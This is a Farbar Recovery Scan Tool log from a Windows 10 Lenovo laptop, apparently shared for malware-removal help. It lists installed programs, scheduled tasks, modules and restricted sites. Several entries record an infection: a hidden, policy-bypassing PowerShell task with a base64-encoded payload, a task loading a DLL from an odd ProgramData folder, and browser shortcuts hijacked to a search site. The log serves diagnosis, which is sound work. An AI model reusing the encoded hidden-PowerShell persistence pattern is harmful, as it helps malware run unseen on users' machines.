﻿Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Ivushka (2016-02-28 09:00:56)
Running from C:\Users\Ivushka\Desktop
Windows 10 Home (X64) (2015-12-12 00:35:35)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3127553534-2473892740-565383663-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3127553534-2473892740-565383663-503 - Limited - Disabled)
Guest (S-1-5-21-3127553534-2473892740-565383663-501 - Limited - Disabled)
Ivushka (S-1-5-21-3127553534-2473892740-565383663-1002 - Administrator - Enabled) => C:\Users\Ivushka

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ACP Application (Version: 2.15.30.0019 - Advanced Micro Devices, Inc.) Hidden
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{BDDE0D38-C265-EF2B-057D-E6A374D1E036}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
AVG (HKLM\...\AvgZen) (Version: 1.41.1.56922 - AVG Technologies)
AVG (Version: 16.41.7442 - AVG Technologies) Hidden
AVG 2016 (Version: 16.0.4537 - AVG Technologies) Hidden
AVG Protection (HKLM\...\AVG) (Version: 2016.41.7442 - AVG Technologies)
AVG Zen (Version: 1.41.29 - AVG Technologies) Hidden
Components (x32 Version: 1.0.023.00 - Lenovo) Hidden
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.0.5521 - CyberLink Corp.)
Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.6.3.1 - Dolby Laboratories Inc)
FMW 1 (Version: 1.62.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Lenovo Accelerator Application (HKLM-x32\...\{10672FE6-3D50-4F79-B0C7-A5573A5D415D}) (Version: 2.2.0.0701 - Lenovo)
Lenovo BatteryGauge (HKLM\...\{B8D3ED8D-A295-44C2-8AE1-56823D44AD1F}) (Version: 1.0.007.00 - Lenovo)
Lenovo Bluetooth with Enhanced Data Rate Software (HKLM\...\{C6D9ED03-6FCF-4410-9CB7-45CA285F9E11}) (Version: 12.0.1.716 - Broadcom Corporation)
Lenovo EasyCamera (HKLM-x32\...\{E399A5B3-ED53-4DEA-AF04-8011E1EB1EAC}) (Version: 6.3.9600.11105 - Realtek Semiconductor Corp.)
Lenovo Experience Improvement (HKLM\...\LenovoExperienceImprovement) (Version: 2.0.9.0 - Lenovo)
Lenovo FusionEngine  (HKLM-x32\...\Lenovo FusionEngine) (Version: 1.0.13.0 - Lenovo, Inc.)
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.1.0.4210 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.1.0.4210 - CyberLink Corp.) Hidden
Lenovo Photo Master (HKLM-x32\...\{BC94C56A-3649-420C-8756-2ADEBE399D33}) (Version: 2.1.3330.01 - CyberLink Corp.)
Lenovo pointing device (HKLM\...\Elantech) (Version: 11.4.67.1 - ELAN Microelectronic Corp.)
Lenovo PowerDVD12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5328.55 - CyberLink Corp.)
Lenovo PowerDVD12 (x32 Version: 12.0.5328.55 - CyberLink Corp.) Hidden
Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.019.00 - Lenovo)
Lenovo Solution Center (HKLM\...\{A5591EC4-8AD6-48EE-9F8D-FACFA8BA4E35}) (Version: 3.0.003.00 - Lenovo)
Lenovo System Interface Foundation (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.054.00 - Lenovo)
Lenovo_Wireless_Driver (HKLM-x32\...\{5D642A72-8194-4A22-80DA-11FE610CCA8E}) (Version: 7.35.295.2 - Lenovo)
LenovoUtility (HKLM-x32\...\InstallShield_{6ADA7E88-8D16-4D0D-BC90-2B93AC5E56DA}) (Version: 3.0.0.3 - Lenovo)
LenovoUtility (x32 Version: 3.0.0.3 - Lenovo) Hidden
McAfee LiveSafe - Internet Security (HKLM-x32\...\MSC) (Version: 14.0.7080 - McAfee, Inc.)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0011.00 - Lenovo Group Limited) Hidden
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4693.1005 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Need for Speed Underground 2 verze 1.2 (HKLM-x32\...\{6B8B33B2-6227-4912-9173-0A1F32535CF7}_is1) (Version: 1.2 - )
OEM Application Profile (HKLM-x32\...\{B4B7FD8F-06FC-E277-4F29-8F75F8281D8F}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
OpenOffice 4.1.2 (HKLM-x32\...\{69D27D4C-36CE-4CB2-A290-C38B0A990955}) (Version: 4.12.9782 - Apache Software Foundation)
OpenTTD 1.5.3 (HKLM-x32\...\OpenTTD) (Version: 1.5.3 - OpenTTD)
Opera Stable 34.0.2036.31 (HKLM-x32\...\Opera 34.0.2036.31) (Version: 34.0.2036.31 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.4 - Power Software Ltd)
REACHit (HKLM-x32\...\{4532E4C5-C84D-4040-A044-ECFCC5C6995B}) (Version: 2.5.003.11 - Lenovo)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7553 - Realtek Semiconductor Corp.)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.5.5.2 - Lenovo)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
User Manuals (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 4.0.0.1 - Lenovo)
User Manuals (x32 Version: 4.0.0.1 - Lenovo) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Zoner Photo Studio 16 (HKLM\...\ZonerPhotoStudio16_CZ_is1) (Version: 16.0.1.3 - ZONER software)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3127553534-2473892740-565383663-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Ivushka\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09FA075F-09EF-4FA7-879B-69CD0A3B27D1} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_TVSUUpdateTask => add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler  /v start /t reg_dword /d 1 /f /reg:32
Task: {0EA052B1-41D4-4AAF-B21C-5662BE7F656F} - System32\Tasks\{1FB6B9DA-6CB5-B114-F30F-B7B7489CBB7F} => /s /n /i:"/rt" "C:\PROGRA~3\4849aee0\f982c19.dll"
Task: {0F886C61-E516-460A-BD37-FD1A614A6BE6} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => control iMControllerService 128
Task: {2D6B74BB-CE02-45B6-B4A5-A27BEAB8DCE5} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {2EA9F049-CB5D-4505-908F-A34A8BB8CE08} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-16] (McAfee, Inc.)
Task: {3D063B2C-11BA-4185-BFC1-FAABEBCEC136} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-16] (Google Inc.)
Task: {50079452-3CB5-401C-A976-0A97E2CFCF0F} - System32\Tasks\Lenovo\REACHit Agent Startup => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-02-22] (Lenovo)
Task: {5154DD43-2525-460A-A30F-C62AA7CB2C98} - System32\Tasks\Lenovo\REACHit Agent Update => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-02-22] (Lenovo)
Task: {51E964EF-D2EE-4557-B727-962FBCF1CFC6} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {577C99DD-D39F-4253-9BB7-E188F49E9556} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {61AD9C55-F8FB-45C8-B3E1-01A6D0464F95} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {64CFA85F-BB0D-4042-BD87-0E36EF423E9D} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-14] (Microsoft Corporation)
Task: {6A1F7A52-F4F8-4439-A724-40AA69942613} - System32\Tasks\0116avzUpdateInfo => C:\ProgramData\Avg_Update_0116avz\0116avz_AVG-Secure-Search-Update.exe
Task: {816EEAC3-FDBD-465B-8823-16B0E115747E} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-16] (McAfee, Inc.)
Task: {83CF7A42-D69B-4809-8301-EE78F731BDE3} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {90C86EE4-79E9-4632-985E-32809837363E} - System32\Tasks\{7F0D0947-7D04-090B-7811-7E0D7F79110E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9368 more characters).
Task: {91966792-078A-4509-9507-B3C26D121CD2} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSCService.exe [2015-07-17] (Lenovo)
Task: {941FE4F1-D0FD-4A8A-BAD5-69C4B115C278} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
Task: {9F0D5A9B-7A53-43D6-AC0E-D4557807DF18} - System32\Tasks\Opera scheduled Autoupdate 1449884388 => C:\Program Files (x86)\Opera\launcher.exe [2015-12-09] (Opera Software)
Task: {AA6FDD3C-2990-4DD8-9D0D-B07B408FAD51} - System32\Tasks\CyberLink\Photo Master Gadget startup => C:\Program Files (x86)\Lenovo\Lenovo Photo Master\PhotoMasterWorker.exe [2015-10-11] (CyberLink Corp.)
Task: {C2A7F1E7-2E00-449A-8E0B-EDC107B5A3F2} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_306_pepper.exe [2016-02-10] (Adobe Systems Incorporated)
Task: {C6AB8FB5-EBB7-4D2B-B7E1-D2A9193C6701} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2015-07-17] ()
Task: {C787705E-81C0-43AC-93B5-50E89B64C581} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {C7C726A5-95F8-401C-8A6A-B639262EA0F1} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe
Task: {D1B27509-1D7F-4B24-A512-52AF32A76B42} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2015-07-17] (Lenovo)
Task: {DD7996CD-6C3F-4FB7-AD77-0380072EDC74} - System32\Tasks\Lenovo\BatteryGauge => C:\Program Files\lenovo\BatteryGauge\BatteryGaugeIcon.exe [2015-07-10] (Lenovo)
Task: {E2857575-935A-46E9-A7DC-237A6478AB24} - System32\Tasks\PDVDServ12 Task => C:\Program Files (x86)\Lenovo\PowerDVD12\PDVD12Serv.exe [2015-05-28] (CyberLink Corp.)
Task: {E354B967-8629-4422-9ADB-1EF6B6CBCFB3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {E8B9B397-BE33-4802-AE1C-5310F3879C50} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2015-07-17] ()
Task: {E9FFB3D3-E851-438F-810A-822214C784F3} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {EA09F32E-E3C0-47D6-BE0E-CCD574812DE2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-01-03] (McAfee, Inc.)
Task: {ECEAEEC8-E7CD-4F24-B36D-430B48A83E53} - System32\Tasks\Lenovo\Experience Improvement => C:\Program Files\Lenovo\ExperienceImprovement\LenovoExperienceImprovement.exe [2015-12-11] (Lenovo)
Task: {ED382E89-F045-48AA-8704-BA896D547D24} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-16] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_306_pepper.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Ivushka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G1Eztuttn1,8810c45c-2229-4fee-b0d2-f2a1ef2f3f86,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G1Eztuttn1,8810c45c-2229-4fee-b0d2-f2a1ef2f3f86,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G1Eztuttn1,8810c45c-2229-4fee-b0d2-f2a1ef2f3f86,

==================== Loaded Modules (Whitelisted) ==============

2015-11-01 00:36 - 2015-11-01 00:36 - 00032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2015-07-21 21:37 - 2015-07-21 21:37 - 00127488 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2015-12-11 19:53 - 2015-08-11 01:14 - 00404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2015-11-01 01:22 - 2015-11-01 01:22 - 00024312 _____ () C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe
2015-07-27 16:08 - 2015-07-27 16:08 - 00049408 _____ () C:\Program Files\Lenovo\Bluetooth Software\btwleapi.dll
2015-11-01 01:22 - 2015-11-01 01:22 - 00226216 _____ () C:\Program Files\update\UpdateAgent.exe
2015-12-11 19:53 - 2015-09-16 22:48 - 02494712 _____ () C:\Windows\system32\CoreUIComponents.dll
2015-12-11 19:53 - 2015-09-16 22:48 - 02494712 _____ () C:\Windows\System32\CoreUIComponents.dll
2015-12-11 19:53 - 2015-09-16 21:43 - 02028544 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RulesService.dll
2015-12-11 19:53 - 2015-11-24 20:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-11 19:53 - 2015-11-24 20:17 - 00619008 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SignalsManager.dll
2015-12-11 19:53 - 2015-11-24 20:18 - 00928768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RulesBackgroundTasks.dll
2015-12-11 20:00 - 2015-09-16 21:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-11 19:53 - 2015-11-24 20:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-11 19:53 - 2015-11-24 20:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-12-11 19:53 - 2015-09-16 21:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-10-31 23:49 - 2015-10-31 23:49 - 00791848 _____ () C:\Program Files\Lenovo\LenovoUtility\utility.exe
2015-10-31 23:49 - 2015-10-31 23:49 - 00097048 _____ () C:\Program Files\Lenovo\LenovoUtility\kbdhook.dll
2015-11-01 01:13 - 2015-02-08 19:18 - 00124440 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2016-02-27 09:44 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-02-27 09:44 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-02-27 09:44 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-02-27 09:44 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-02-27 09:44 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2016-02-27 12:53 - 2016-02-10 14:54 - 00161736 _____ () C:\ProgramData\Lenovo\iMController\Plugins\LenovoAudioPlugin\x86\QualityStatsRevInterop.dll
2015-10-31 23:55 - 2014-07-03 20:35 - 00627672 _____ () C:\Program Files (x86)\Lenovo\Power2Go\CLMediaLibrary.dll
2014-07-04 11:35 - 2014-07-04 11:35 - 00016856 _____ () C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvcPS.dll
2015-10-31 23:52 - 2015-02-12 15:02 - 00224696 _____ () C:\Program Files (x86)\Lenovo\CCSDK\SDKClient.dll
2015-12-11 17:39 - 2015-12-09 07:11 - 61564536 _____ () C:\Program Files (x86)\Opera\34.0.2036.31\opera.dll
2015-12-11 17:39 - 2015-12-09 07:11 - 01983096 _____ () C:\Program Files (x86)\Opera\34.0.2036.31\libglesv2.dll
2015-12-11 17:39 - 2015-12-09 07:11 - 00081528 _____ () C:\Program Files (x86)\Opera\34.0.2036.31\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7871 more sites.

IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3127553534-2473892740-565383663-1002\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
